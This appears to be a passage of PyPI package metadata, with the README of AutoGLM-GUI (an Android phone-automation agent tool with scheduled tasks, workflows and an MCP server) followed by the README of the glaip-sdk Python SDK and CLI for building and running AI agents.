--apikey sk-xxxxx
# Point at your self-hosted vLLM/SGLang service
pip install autoglm-gui
autoglm-gui --base-url http://localhost:8000/v1 --model autoglm-phone-9b
```
## 🔄 Upgrade Guide
### Check the current version
```bash
# Show the installed version
pip show autoglm-gui
# Or use the CLI flag
autoglm-gui --version
```
### Upgrade to the latest version
**With pip:**
```bash
# Upgrade to the latest release
pip install --upgrade autoglm-gui
```
## 📖 Usage
### Multi-device management
AutoGLM-GUI can control several Android devices at once:
1. **Device list** - the left sidebar automatically shows all connected ADB devices
2. **Device selection** - click a device card to switch to its control panel
3. **Status indicators** - each device's online and initialization status is clearly shown
4. **State isolation** - each device has its own chat history, configuration, and video stream
**Device status legend**:
- 🟢 Green dot: device online
- ⚪ Grey dot: device offline
- ✓ Mark: device initialized
#### 📱 QR-code wireless pairing (recommended on Android 11+)
**No cable required**; the phone and computer just need to be on the same WiFi network:
1. **On the phone**:
   - Open "Settings" → "Developer options" → enable "Wireless debugging"
   - Keep the phone and computer on the same WiFi network
2. **On the computer**:
   - Click the ➕ "Add wireless device" button at the bottom left
   - Switch to the "Pair device" tab
   - **A QR code is generated automatically**; wait for the scan
3. **Scan with the phone**:
   - On the "Wireless debugging" page, tap "Pair device with QR code"
   - Scan the QR code shown on the computer
   - Once pairing succeeds, the device appears in the device list automatically
**Highlights**:
- ✅ No cable at all
- ✅ One scan to pair
- ✅ Devices are discovered and connected automatically
- ✅ Works on Android 11 and above
### AI Automation Mode
1. **Connect a device** - use any of the methods above (QR pairing recommended on Android 11+)
2. **Select the device** - pick the device to control in the left sidebar
3. **Initialize** - click "Initialize device" to configure the Agent
4. **Chat** - describe what you want (e.g. "order a cup of CHAGEE's Boya Juexian on Meituan")
5. **Watch** - the Agent executes step by step, showing its reasoning and actions in real time
### 🤖 Choosing an Agent Type
When initializing a device, you can pick an Agent type (default: GLM Agent):
- **GLM Agent**: tuned for GLM models, mature and stable, fits most tasks
- **MAI Agent**: an **in-house** Mobile Agent that uses multiple historical screenshots as context, suited to complex tasks
  - 🆕 **Now fully internalized**: ~1200 lines of third-party dependencies removed, with performance tuning and Chinese-language adaptation
  - 🔄 **Backward compatible**: choose the `mai_legacy` type if you need the old behavior
MAI Agent configurable parameters:
- `history_n`: number of historical screenshots (1-10, default: 3)
**MAI Agent enhancements** (v1.5.0+):
- ✅ Streaming thought output (reasoning shown in real time)
- ✅ Chinese-optimized prompts (tailored to domestic app scenarios)
- ✅ Performance monitoring (LLM latency, action execution stats)
- ✅ Detailed operation guidance and error-avoidance hints
<a id="mode-classic"></a>
### 🌿 Classic Mode (single model / Open AutoGLM)
This is the **native form of the open-source AutoGLM-Phone**: a single vision model handles the full loop of understanding the task → planning steps → observing the screen → executing actions.
- **Pros**: simplest to configure, fastest to get started
- **Best for**: well-defined tasks with few steps (e.g. opening an app, simple navigation)
<a id="mode-layered"></a>
### 🧩 Layered Agent Mode (enhanced / experimental)
Layered agent mode is a stricter two-tier structure: the **planning layer** focuses on decomposition and reasoning, the **execution layer** on observing and acting; the two cooperate through tool calls to complete the task.
- **How it works**: the planning layer (decision model) calls tools (such as `list_devices()` / `chat(device_id, message)`) to drive the execution layer; each tool call and its result is visible in the UI
- **Execution granularity**: the execution layer performs one atomic sub-task at a time, with a step cap (e.g. at most 5 steps per call), so the planning layer can adjust strategy based on feedback
- **Best for**: complex tasks needing multi-turn reasoning and plan revision on the fly (e.g. browsing/filtering/comparison, multi-step form filling)
- **Key limitation**: the execution layer does not take notes, save intermediate information, or extract text into variables; when the planning layer needs information, it must ask questions so the execution layer reads the screen contents back
> 📖 **Deep dive**: see the [Layered Agent architecture analysis](./docs/docs/layered_agent_analysis.md) for the technical principles, data flow, and implementation details
### 🎭 Comparing the Two Modes
AutoGLM-GUI offers two agent working modes for different scenarios:
#### 1️⃣ Classic Mode
- **Architecture**: a single `autoglm-phone` vision model handles everything (the plain Open AutoGLM experience)
- **Best for**: simple, well-defined tasks
- **Traits**: minimal configuration, ideal for getting started quickly
#### 2️⃣ Layered Agent
- **Architecture**: a layered task-execution system built on the Agent SDK
  - **Planning layer**: the decision model acts as the high-level brain, decomposing tasks and reasoning across turns
  - **Execution layer**: autoglm-phone acts as the operator, responsible only for observing and acting
- **Best for**: advanced tasks that need multi-turn interaction and complex reasoning
- **Traits**: the planner drives the executor via tool calls, making the process more transparent and easier to debug and iterate on
**Recommendation**:
- 🚀 **Routine tasks (ordering food, hailing a ride)**: Classic Mode
- 🏗️ **Tasks that need multi-round reasoning**: Layered Agent Mode
### Manual Control Mode
Besides AI automation, you can operate the phone directly on the live view:
1. **Live view** - The right side of the device panel streams the phone screen in real time (via scrcpy)
2. **Tap** - Click anywhere on the view; the tap is sent to the phone immediately
3. **Swipe** - Hold and drag the mouse to swipe (mouse-wheel scrolling is supported)
4. **Visual feedback** - Every action shows a ripple animation and a success/failure hint
5. **Accurate mapping** - Screen scaling and coordinate conversion are handled automatically so taps land in the right place
6. **Display modes** - Switch between auto, video-stream, and screenshot display modes
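The coordinate conversion in step 5 boils down to scaling view-space clicks into device-space pixels. A minimal sketch, assuming a simple full-frame mapping (the function name and layout are hypothetical, not AutoGLM-GUI's actual code, which would also handle letterboxing and rotation):

```python
def view_to_device(x: float, y: float,
                   view_w: int, view_h: int,
                   dev_w: int, dev_h: int) -> tuple[int, int]:
    """Map a click in the scaled video view to device-pixel coordinates.

    Hypothetical helper: scales each axis by the ratio of device size
    to view size, then rounds to whole pixels.
    """
    return round(x * dev_w / view_w), round(y * dev_h / view_h)

# A click at (180, 320) in a 360x640 view maps to (540, 960) on a 1080x1920 screen
print(view_to_device(180, 320, 360, 640, 1080, 1920))  # (540, 960)
```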
### ⏰ Scheduled Tasks (a core productivity feature)
AutoGLM-GUI ships with a built-in task scheduler that lets the AI act on your timetable, turning it into a 7x24 automation assistant.
**Typical use cases**:
- 📅 **Daily check-in**: collect app check-in rewards at a fixed time
- 🔔 **Periodic checks**: poll order status, logistics updates, and stock changes on a schedule
- 📧 **Reminders**: send messages and reminders at set times
- 🎮 **Game chores**: finish daily quests and claim rewards automatically
- 💰 **Price monitoring**: watch product prices periodically and order automatically
**How to use it**:
1. **Create a task** - On the "Scheduled Tasks" page of the web UI, create a new task
2. **Set a Cron expression** - Specify the run time with Cron syntax (e.g. `0 8 * * *` means every day at 8:00 AM)
3. **Pick a device** - Choose which Android device to control
4. **Define the task** - Describe the actions to perform (saved Workflows are supported)
5. **Enable it** - Once enabled, the system runs the task automatically at the scheduled time
**Recommended with Docker**:
- Deploy AutoGLM-GUI on a server (VPS, NAS, spare PC)
- Connect Android devices over WiFi
- The server runs 7x24, so scheduled tasks fire on time
- Review execution history and logs from the web UI at any time
**Conversation-history support**:
- Every scheduled run is recorded automatically
- Browse past runs in detail to trace issues
- Failed runs record their error messages automatically
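To make the Cron semantics above concrete, here is a tiny matcher for the five-field syntax. This is purely illustrative - it supports only `*` and plain integers, and is not the scheduling engine AutoGLM-GUI actually uses (its dependency list points to APScheduler):

```python
from datetime import datetime

def cron_matches(expr: str, dt: datetime) -> bool:
    """Check whether a datetime matches a 5-field Cron expression.

    Fields: minute, hour, day-of-month, month, day-of-week (0 = Sunday).
    Simplified illustration: each field is either '*' or one integer.
    """
    fields = expr.split()
    values = [dt.minute, dt.hour, dt.day, dt.month, dt.isoweekday() % 7]
    for spec, value in zip(fields, values):
        if spec != "*" and int(spec) != value:
            return False
    return True

# "0 8 * * *" fires at 08:00 every day
print(cron_matches("0 8 * * *", datetime(2025, 1, 1, 8, 0)))  # True
print(cron_matches("0 8 * * *", datetime(2025, 1, 1, 9, 0)))  # False
```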
### Workflow Management
Save frequently used tasks as Workflows for one-click execution:
#### Creating and Managing Workflows
1. **Open the management page** - Click the Workflows icon (📋) in the left navigation bar
2. **Create a Workflow** - Click the "New Workflow" button in the top-right corner
3. **Fill in the details**:
   - **Name**: a short, memorable name (e.g. "Order 霸王茶姬 tea")
   - **Task content**: a detailed description of the task (e.g. "Order a cup of 伯牙绝弦 from 霸王茶姬 on Meituan, no ice, add pearls")
4. **Save** - Click the save button
**Management actions**:
- **Edit** - Click "Edit" on a Workflow card to modify it
- **Delete** - Click "Delete" to remove a Workflow you no longer need
- **Preview** - Each card previews the first few lines of the task content
#### Running a Workflow Quickly
Run a saved Workflow from the Chat view:
1. **Select a device** - Make sure the target device is selected and initialized
2. **Open the Workflow picker** - Click the Workflow button (📋 icon) next to the input box
3. **Pick a task** - Click the Workflow you want to run
4. **Auto-fill** - Its task content is filled into the input box automatically
5. **Send** - Click send to start execution
**Example scenarios**:
- 📱 **Daily errands**: order food, hail rides, track parcels
- 🎮 **Game chores**: daily check-ins, reward claims
- 📧 **Messaging**: broadcast fixed-content messages
- 🔄 **Recurring work**: maintenance tasks that run periodically
### 📚 Conversation History (new in v1.5.0)
All conversations and execution records are saved automatically to a local database for review and tracing:
**Core features**:
- 💾 **Auto-save**: conversations, AI reasoning, and execution steps are recorded in full
- 🔍 **History browsing**: view every past conversation in the web UI
- 📊 **Execution tracing**: inspect each run in detail, including screenshots, actions, and results
- ⏰ **Scheduled-task logs**: scheduled runs are linked to conversation history automatically
- 🐛 **Diagnostics**: failed tasks keep full logs for quick root-cause analysis
**Use cases**:
- Review the AI's decision process to refine prompts and task descriptions
- Verify that scheduled tasks ran on time
- Look up past actions and reuse strategies that worked
- Check detailed logs and screenshots when troubleshooting
**Data storage**:
- Default location: `~/.config/autoglm/history.db` (a SQLite database)
- Docker deployments: mount a volume to persist the data
- Export and backup are supported
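Because the history is a plain SQLite file, it can be inspected with Python's standard library. A minimal sketch - the table and column names below are hypothetical (the actual schema is not documented in this README), so the demo builds an in-memory stand-in; point `sqlite3.connect` at the real path to explore the live database:

```python
import sqlite3
from pathlib import Path

# Default location of the real database (not opened in this demo)
db_path = Path.home() / ".config" / "autoglm" / "history.db"

conn = sqlite3.connect(":memory:")  # swap in str(db_path) for the real DB

# Hypothetical schema standing in for the real (undocumented) one
conn.execute("CREATE TABLE conversations (id INTEGER PRIMARY KEY,"
             " device_id TEXT, message TEXT)")
conn.execute("INSERT INTO conversations (device_id, message)"
             " VALUES ('emulator-5554', 'open Settings')")

# Listing tables works against any SQLite file, real or demo
tables = [row[0] for row in conn.execute(
    "SELECT name FROM sqlite_master WHERE type='table'")]
print(tables)  # ['conversations']
```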
## 🎯 Productivity Scenarios
AutoGLM-GUI v1.5 has grown from a simple "phone assistant" into an "AI automation hub"; typical productivity scenarios follow:
### Scenario 1: Server-Side Scheduled Automation
**Setup**:
```bash
# Deploy with Docker on a VPS/NAS
docker-compose up -d
# Connect Android devices over WiFi
# Configure scheduled tasks in the web UI
```
**Typical tasks**:
- ⏰ Check in for reward points at 8:00 every morning
- ⏰ Check order status and send a notification at 22:00 every night
- ⏰ Watch a product's price every hour
- ⏰ Order lunch automatically at 12:00 every day
**Value**: the AI assistant runs 7x24 on a server with no human intervention
### Scenario 2: Multi-Device Fleet Management
**Setup**:
- Connect 3-5 Android devices (USB or WiFi)
- Give each device its own automation tasks
**Typical tasks**:
- Device A: e-commerce price monitoring + automatic comparison
- Device B: scheduled social-media publishing
- Device C: game idling + daily quests
- Device D: logistics monitoring + status push
**Value**: manage a fleet of devices from one console and automate at scale
### Scenario 3: Development, Debugging, and CI/CD
**Setup**:
```bash
# Run automated tests against an emulator
# Emulators need zero configuration and are detected automatically
```
**Typical tasks**:
- 🧪 Automated UI testing (regression)
- 📱 App install/uninstall/upgrade testing
- 🔄 Multi-version compatibility verification
- 📊 Performance test data collection
**Value**: plug into CI/CD pipelines for automated mobile testing
### Scenario 4: Personal Productivity
**Setup**:
- Run the desktop app or the Python package locally
- Define your common Workflows
**Typical tasks**:
- 📝 Compile yesterday's work notes before the morning stand-up
- 💰 Log daily expenses into a bookkeeping app
- 📧 Send a fixed-format weekly report on schedule
- 🏃 Auto check-in on a fitness app
**Value**: cut repetitive work and focus on creative tasks
### Key Feature Combinations
| Combination | Scenario |
|---------|---------|
| Scheduled tasks + Docker + WiFi connection | 7x24 server-side automation |
| Multi-device + Workflows + conversation history | Fleet management + action tracing |
| Layered Agent + instant interrupt + live preview | Debugging and tuning complex tasks |
| Emulator direct connect + CI/CD integration | Automated test pipelines |
## 🛠️ Development Guide
### Installing from Source
To develop or customize from source, follow these steps:
```bash
# 1. Clone the repository
git clone https://github.com/suyiiyii/AutoGLM-GUI.git
cd AutoGLM-GUI
# 2. Install dependencies
uv sync
# 3. Build the frontend (required)
uv run python scripts/build.py
# 4. Start the service
uv run autoglm-gui --base-url http://localhost:8080/v1
```
### Fast Development Loop
```bash
# Backend development (auto-reload)
uv run autoglm-gui --base-url http://localhost:8080/v1 --reload
# Frontend dev server (hot reload)
cd frontend && pnpm dev
```
### Building and Packaging
```bash
# Build the frontend only
uv run python scripts/build.py
# Build the full package
uv run python scripts/build.py --pack
```
## 🔌 MCP (Model Context Protocol) Integration
AutoGLM-GUI ships with a built-in MCP server, so other AI applications (Claude Desktop, Cline, Cursor, etc.) can use it as a tool that provides Android device automation.
### What is MCP?
MCP (Model Context Protocol) is an open protocol that lets AI applications connect to external data sources and tools. Through MCP, AIs such as Claude or Cursor can operate your Android device directly.
### MCP Tools
AutoGLM-GUI exposes two MCP tools:
#### 1. `chat(device_id, message)` - Run a Phone Task
Sends an automation task to the given device; the AI then drives the phone to complete it.
**Parameters**:
- `device_id`: device identifier (e.g. "192.168.1.100:5555" or a device serial number)
- `message`: a natural-language task description (e.g. "open WeChat", "send a message")
**Traits**:
- ✅ Initializes the device automatically (using the global configuration)
- ✅ **Fail-fast strategy**: errors out immediately when an element cannot be found instead of guessing coordinates
- ✅ **5-step limit**: suited to atomic operations, prevents infinite loops
- ✅ **Dedicated prompt**: tuned for a fast-execution mode
#### 2. `list_devices()` - List Connected Devices
Returns every connected ADB device and its status.
**Returned information**:
- Device ID and model
- Connection type (USB/WiFi)
- Online status
- Agent initialization status
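The call shapes of these two tools can be sketched as plain Python functions. Everything below is illustrative - the device data and return formats are made up, and the real server is built on FastMCP rather than bare functions:

```python
# Illustrative stand-ins for the two MCP tools; the device entry is fabricated.
DEVICES = {
    "emulator-5554": {"model": "sdk_gphone64_x86_64",
                      "connection": "USB", "online": True, "initialized": False},
}

def list_devices() -> list[dict]:
    """Return every known ADB device with its status."""
    return [{"device_id": dev_id, **info} for dev_id, info in DEVICES.items()]

def chat(device_id: str, message: str) -> str:
    """Dispatch a natural-language task to one device (stubbed here)."""
    if device_id not in DEVICES:
        raise ValueError(f"unknown device: {device_id}")
    return f"queued {message!r} on {device_id}"

print(list_devices()[0]["device_id"])  # emulator-5554
print(chat("emulator-5554", "open WeChat"))
```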
### Use Cases
**Typical applications**:
- 🤝 **Claude Desktop**: let Claude operate your Android device directly
- 💻 **IDE integration**: call phone automation from Cursor or VS Code (Cline)
- 🔄 **Workflow integration**: one link in an AI-agent tool chain
- 🧪 **Automated testing**: AI-assisted mobile UI testing
**Example**:
```
User: Open WeChat on my phone and message Zhang San "meeting at 3 PM"
AI:
1. Call list_devices() to find the device
2. Call chat(device_id, "open WeChat")
3. Call chat(device_id, "search for contact Zhang San")
4. Call chat(device_id, "send the message: meeting at 3 PM")
```
### Configuring MCP Clients
#### Claude Desktop
1. **Start AutoGLM-GUI** (make sure the MCP endpoint is reachable):
```bash
# Use the default MCP endpoint (mounted at /mcp)
autoglm-gui --base-url http://localhost:8080/v1
```
2. **Edit the Claude Desktop configuration file**:
**macOS**: `~/Library/Application Support/Claude/claude_desktop_config.json`
**Windows**: `%APPDATA%\Claude\claude_desktop_config.json`
Add the following:
```json
{
  "mcpServers": {
    "autoglm-gui": {
      "transport": {
        "type": "http",
        "url": "http://localhost:8000/mcp"
      }
    }
  }
}
```
3. **Restart Claude Desktop**; the AutoGLM-GUI tools are then available in conversations.
#### Cline (VS Code)
Search for "cline" in the VS Code settings and add an MCP server entry:
```json
{
  "cline.mcpServers": {
    "autoglm-gui": {
      "transport": {
        "type": "http",
        "url": "http://localhost:8000/mcp"
      }
    }
  }
}
```
#### Cursor
Add an MCP server in the Cursor settings (Settings → MCP Servers):
```json
{
  "mcpServers": {
    "autoglm-gui": "http://localhost:8000/mcp"
  }
}
```
### MCP Endpoints
AutoGLM-GUI's MCP server is exposed over HTTP:
- **Base URL**: `http://localhost:8000/mcp`
- **Transport**: HTTP + SSE (Server-Sent Events)
- **Port**: follows the main service port (default 8000)
**Endpoint paths**:
- `/mcp/sse` - SSE transport endpoint
- `/mcp/messages` - message endpoint
### Technical Architecture
**Implementation**:
- Built on the **FastMCP** library
- The MCP HTTP app is mounted at the FastAPI root path `/`
- Integrated as an ASGI app, sharing the FastAPI lifecycle
- Device locking: via the `PhoneAgentManager.use_agent` context manager
**Dedicated prompt features**:
- **Fail-fast**: errors out immediately when an element is missing; guessing coordinates is forbidden
- **Step limit**: aborts automatically after 5 steps without completion
- **Target verification**: an element must be confirmed visible on screen before acting
- **Error conventions**: standardized `ELEMENT_NOT_FOUND` and `STEP_LIMIT_EXCEEDED` errors
### Best Practices
1. **Atomic tasks**: the MCP `chat` tool is designed for atomic operations (finishable within 5 steps); split complex tasks into multiple subtasks
2. **Device management**: call `list_devices()` first to confirm the device is online, then act
3. **Error handling**: the AI should catch `ELEMENT_NOT_FOUND` errors, adjust its strategy, and retry
4. **Performance**: prefer a local API (e.g. vLLM/SGLang) for MCP calls to cut network latency
### Example Conversation
**In Claude Desktop**:
```
User: How many devices are connected on my phone setup?
Claude: Let me call the list_devices() tool...
[MCP tool call] list_devices()
Result: 1 device found
- Device ID: emulator-5554
- Model: sdk_gphone64_x86_64
- Status: online
User: Open the Settings app on the emulator
Claude: I'll call the chat tool to operate the device...
[MCP tool call] chat("emulator-5554", "open the Settings app")
Result: ✅ done
Step 1: Launch(app="Settings")
Step 2: wait for the app to load
Step 3: done
The Settings app is now open.
```
## 🐳 Docker Deployment in Detail
> 💡 **Tip**: Docker deployment has been folded into the [Quick Start](#-快速开始) section; see "Option 2: Docker deployment" above first.
This section covers additional Docker configuration options and advanced usage.
### Choosing a Listen Port
With host networking, change the default port (8000) via the `command` arguments:
```bash
# Listen on port 9000
docker run -d --network host \
  -v autoglm_config:/root/.config/autoglm \
  -v autoglm_logs:/app/logs \
  ghcr.io/suyiiyii/autoglm-gui:main \
  autoglm-gui --host 0.0.0.0 --port 9000 --no-browser
```
With bridge networking, map the port with `-p` instead:
```bash
# Map host port 9000 to container port 8000
docker run -d -p 9000:8000 \
  -v autoglm_config:/root/.config/autoglm \
  -v autoglm_logs:/app/logs \
  ghcr.io/suyiiyii/autoglm-gui:main
```
### Image Tags
| Tag | Description |
|------|------|
| `main` | Tracks the latest code on the main branch; recommended |
| `<commit-sha>` | Image for a specific commit (e.g. `abc1234`); use to pin a version |
### Environment Variables
| Variable | Description | Default |
|------|------|--------|
| `AUTOGLM_BASE_URL` | Model API address | (required) |
| `AUTOGLM_MODEL_NAME` | Model name | `autoglm-phone` |
| `AUTOGLM_API_KEY` | API key | (required) |
### Health Check
```bash
# Check service status
curl http://localhost:8000/api/health
```
## 🤝 Contributing
Community contributions are warmly welcome! Whether you fix bugs, add features, improve the docs, or share your experience, it all adds real value to the project.
### 🎯 Contribution Quick Start
1. **Read the pinned issue** - [🎯 Start Here: 如何贡献 / 认领任务 / 本地跑起来](https://github.com/suyiiyii/AutoGLM-GUI/issues/170)
2. **Read the contribution guide** - see [CONTRIBUTING.md](./CONTRIBUTING.md) for detailed steps
3. **Claim a task** - comment `/assign me` on an issue that interests you
### 💡 Ways to Contribute
- 🐛 **Fix bugs** - look for issues labeled `bug`
- ✨ **Add features** - implement requests labeled `enhancement`
- 📖 **Improve docs** - fix errors, clarify wording, add examples
- 🧪 **Add tests** - raise code quality and test coverage
- 🌍 **Translate docs** - help users in more languages
### 🏷️ Beginner-Friendly Tasks
If this is your first open-source contribution, start with these:
- Look for issues labeled [`good first issue`](https://github.com/suyiiyii/AutoGLM-GUI/labels/good%20first%20issue)
- Improve the docs (fix typos, add clarifications)
- Try the software and report your experience
### 📚 Reference Material
| Document | Description |
|------|------|
| [CONTRIBUTING.md](./CONTRIBUTING.md) | Full contribution guide (environment setup, workflow, PR conventions) |
| [CLAUDE.md](./CLAUDE.md) | Technical architecture notes (code structure, key implementation details) |
| [Issues](https://github.com/suyiiyii/AutoGLM-GUI/issues) | Browse and claim tasks |
### 💬 Discussion
- 💭 Discuss ideas and problems in issues
- 🎮 Join the [QQ group](https://qm.qq.com/q/J5eAs9tn0W)
- 📝 [Open a new issue](https://github.com/suyiiyii/AutoGLM-GUI/issues/new/choose) to report problems or make suggestions
Thanks to every contributor - you make AutoGLM-GUI better! 🎉
## 📝 License
Apache License 2.0
### License Notes
AutoGLM-GUI bundles the ADB Keyboard APK (`com.android.adbkeyboard`), which is licensed under GPL-2.0. The ADB Keyboard component is used as a standalone tool and does not affect AutoGLM-GUI's own Apache 2.0 license.
See: `AutoGLM_GUI/resources/apks/ADBKeyBoard.LICENSE.txt`
## 🙏 Acknowledgements
This project is built on [Open-AutoGLM](https://github.com/zai-org/Open-AutoGLM); thanks to the zai-org team for their excellent work on AutoGLM.
| text/markdown | suyiiyii | null | null | null | null | ai, android, autoglm, automation, gui, phone-agent | [
"Development Status :: 3 - Alpha",
"Environment :: Web Environment",
"Framework :: FastAPI",
"Intended Audience :: Developers",
"License :: OSI Approved :: Apache Software License",
"Operating System :: OS Independent",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Topic :: Software Development :: Libraries :: Python Modules"
] | [] | null | null | >=3.10 | [] | [] | [] | [
"apscheduler<4.0.0,>=3.10.0",
"fastapi>=0.124.0",
"fastmcp>=2.0.0",
"httpx[socks]>=0.28.1",
"jinja2>=3.1.0",
"loguru>=0.7.3",
"numpy>=1.24.0",
"openai-agents>=0.6.4",
"openai>=2.9.0",
"pillow>=11.3.0",
"prometheus-client>=0.21.0",
"python-socketio>=5.11.0",
"pyyaml>=6.0.3",
"uvicorn[standard]>=0.38.0",
"zeroconf>=0.148.0"
] | [] | [] | [] | [
"Homepage, https://github.com/suyiiyii/AutoGLM-GUI",
"Repository, https://github.com/suyiiyii/AutoGLM-GUI"
] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T09:12:50.981593 | autoglm_gui-1.5.11.tar.gz | 5,858,371 | da/99/caed2f5e32af28025454ffced2362830b3aa53c3b30f56b7d0af7a35a84a/autoglm_gui-1.5.11.tar.gz | source | sdist | null | false | b7b28e99260722279bcb970816cce387 | 11b6d3ce0459659147beddbc599a1973d670ca6468e4e40f1aa44ca32de1f764 | da99caed2f5e32af28025454ffced2362830b3aa53c3b30f56b7d0af7a35a84a | Apache-2.0 | [
"LICENSE"
] | 227 |
2.3 | glaip-sdk | 0.8.5 | Python SDK and CLI for GL AIP (GDP Labs AI Agent Package) - Build, run, and manage AI agents | # GL AIP — GDP Labs AI Agents Package
[](https://www.python.org/downloads/)
[](https://github.com/psf/black)
GL stands for **GDP Labs**—GL AIP is our AI Agents Package for building, running, and operating agents.
> **Python SDK and CLI for GL AIP - Connect, configure, and manage AI agents on the GDP Labs AI Agents Package.**
## 🚀 Quick Start
### Installation
Installing `glaip-sdk` provides both the **Python SDK** and the **`aip` CLI command** in a single package.
```bash
# Using pip (recommended)
pip install --upgrade glaip-sdk
# Using uv (fast alternative)
uv tool install glaip-sdk
# Using pipx (CLI-focused, isolated environment)
pipx install glaip-sdk
```
**Requirements**: Python 3.11 or 3.12
**Updating**: The `aip` CLI automatically detects your installation method and uses the correct update command:
- If installed via `pip`: Uses `pip install --upgrade glaip-sdk`
- If installed via `uv tool install`: Uses `uv tool install --upgrade glaip-sdk`
- You can also update manually using the same command you used to install
## 🐍 Hello World - Python SDK
Perfect for building applications and integrations.
### Step 1: Environment Setup
Create a `.env` file:
```bash
# .env
AIP_API_URL=https://your-gl-aip-instance.com
AIP_API_KEY=your-api-key
```
### Step 2: Basic Python Script
```python
# hello_world.py
from glaip_sdk import Client
import os
from dotenv import load_dotenv
# Load environment variables
load_dotenv()
# Initialize client
client = Client()
# Create a simple agent
agent = client.agents.create(
name="hello-sdk",
instruction="You are a helpful assistant who responds clearly and concisely."
)
# Run the agent
result = agent.run("Hello world, what's 2+2?")
print(f"Agent response: {result}")
```
### Step 3: Run Your Script
```bash
python hello_world.py
```
### Step 4: Advanced Example with Streaming
```python
# streaming_example.py
from glaip_sdk import Client
import os
from dotenv import load_dotenv
load_dotenv()
client = Client()
# Create agent with streaming
agent = client.agents.create(
name="streaming-agent",
instruction="You are a helpful assistant. Provide detailed responses."
)
# Stream the response
print("Streaming response:")
client.agents.run_agent(
agent.id,
"Explain quantum computing in simple terms",
verbose=True,
)
print("--- Stream complete ---")
```
🎉 **SDK Success!** You're now ready to build AI-powered applications with Python.
______________________________________________________________________
## 💻 Hello World - CLI
Perfect for quick testing and command-line workflows.
### Step 1: Configure Connection
```bash
# Interactive setup (recommended)
aip configure
```
Or set environment variables:
```bash
export AIP_API_URL="https://your-gl-aip-instance.com"
export AIP_API_KEY="your-api-key"
```
### Step 2: Verify Connection
```bash
aip status
```
### Step 3: Create & Run Your First Agent
```bash
# Create a simple agent
aip agents create --name "hello-cli" --instruction "You are a helpful assistant"
# List agents to get the ID
aip agents list
# Run the agent with input
aip agents run <AGENT_ID> --input "Hello world, what's the weather like?"
```
🎉 **CLI Success!** You're now ready to use the CLI for AI agent workflows.
## ✨ Key Features
- **🤖 Agent Management**: Create, run, and orchestrate AI agents with custom instructions and streaming
- **🧠 Language Models**: Choose from multiple AI models per agent with manual PII tag mapping
- **🛠️ Tool Integration**: Extend agents with custom Python tools and script management
- **🔌 MCP Support**: Connect external services through Model Context Protocols with tool discovery
- **🔄 Multi-Agent Patterns**: Hierarchical, parallel, sequential, router, and aggregator patterns
- **🎙️ Audio Interface (beta)**: Local-only LiveKit voice sessions for talking to agents (install with `glaip-sdk[audio]`)
- **💻 Modern CLI**: Rich terminal interface with fuzzy search and multiple output formats
## 🎙️ Local Voice (LiveKit, Beta)
You can run a local voice loop that joins a LiveKit room, transcribes your speech, routes text into an agent, and speaks the reply back.
### Prerequisites
- LiveKit server running (monorepo dev: `make -C python/aip-agents livekit-up`)
- LiveKit Meet open in browser (monorepo dev: `make -C python/aip-agents livekit-meet-open`)
- `OPENAI_API_KEY` set (used by `livekit-plugins-openai` for STT/TTS)
### Monorepo Demo Sequence
```bash
# One-time install
make -C python/aip-agents install-audio
# Terminal 1: LiveKit server
make -C python/aip-agents livekit-up
# Terminal 2: Join with browser (enable mic)
make -C python/aip-agents livekit-meet-open
# Terminal 3: Run agent (recommended: debug logs)
AIP_AUDIO_DEBUG=1 make -C python/aip-agents audio-agent-up
# Optional: validate join/disconnect (no browser, no mic)
make -C python/aip-agents livekit-smoke-join
```
Tip: If STT shows odd fragments, it's often speaker-to-mic echo; use headphones.
Example `.env` values for the repo defaults:
```bash
LIVEKIT_URL=ws://localhost:7880
LIVEKIT_API_KEY=devkey
LIVEKIT_API_SECRET=devsecretdevsecretdevsecretdevsecret
LIVEKIT_ROOM_NAME=aip-audio-demo
OPENAI_API_KEY=...
```
### Install
```bash
pip install "glaip-sdk[audio]"
```
### Run the SDK example
From the repo:
```bash
cd python/glaip-sdk
poetry install --extras "audio"
poetry run python examples/sdk/05_audio_session.py
```
More details:
- `python/glaip-sdk/docs/how-to-guides/audio-interface.md`
- `python/glaip-sdk/examples/sdk/livekit-local-dev.md`
## 🌳 Live Steps Panel
The CLI steps panel now streams a fully hierarchical tree so you can audit complex agent runs without leaving the terminal.
- Renders parent/child relationships with `│├└` connectors, even when events arrive out of order
- Marks running steps with spinners and duration badges sourced from SSE metadata before local fallbacks
- Highlights failures inline (`✗ reason`) and raises warning glyphs on affected delegate branches
- Derives deterministic “💭 Thinking…” spans before/after each delegate or tool action to show scheduling gaps
- Flags parallel work with a dedicated glyph and argument-derived labels so simultaneous tool calls stay readable
- Try it locally: `poetry run python scripts/replay_steps_log.py --transcript tests/fixtures/rendering/transcripts/parallel_research.jsonl --output /tmp/parallel.log`
## 📚 Documentation
📖 **[Complete Documentation](https://gdplabs.gitbook.io/gl-aip/gl-aip-sdk/overview)** - Visit our GitBook for comprehensive guides, tutorials, and API reference.
Quick links:
- **[Quick Start Guide](https://gdplabs.gitbook.io/gl-aip/gl-aip-sdk/get-started/quick-start-guide)**: Get your first agent running in 5 minutes
- **[Agent Management](https://gdplabs.gitbook.io/gl-aip/gl-aip-sdk/guides/agents-guide)**: Complete agent lifecycle management
- **[Custom Tools](https://gdplabs.gitbook.io/gl-aip/gl-aip-sdk/guides/tools-guide)**: Build and integrate custom tools
- **[MCP Integration](https://gdplabs.gitbook.io/gl-aip/gl-aip-sdk/guides/mcps-guide)**: Connect external services
- **[API Reference](https://gdplabs.gitbook.io/gl-aip/gl-aip-sdk/reference/python-sdk-reference)**: Complete SDK reference
## 🧪 Simulate the Update Notifier
Need to verify the in-session upgrade flow without hitting PyPI or actually running `pip install`? Use the bundled helper:
```bash
cd python/glaip-sdk
poetry run python scripts/mock_update_notifier.py
# or customize the mock payload:
# poetry run python scripts/mock_update_notifier.py --version 3.3.3 --marker "[nightly build]"
```
The script:
- Launches a SlashSession with prompt-toolkit disabled (so it runs cleanly in tests/CI).
- Forces the notifier to believe a newer version exists (`--version 9.9.9` by default).
- Appends a visible marker (default `[mock update]`) to the banner so you can prove the branding reload happened; pass `--marker ""` to skip.
- Auto-selects “Update now”, mocks the install step, and runs the real branding refresh logic.
- Resets module metadata afterwards so your environment remains untouched.
You should see the Rich banner re-render with the mocked version (and optional marker) at the end of the run.
| text/markdown | Raymond Christopher | raymond.christopher@gdplabs.id | null | null | MIT | null | [
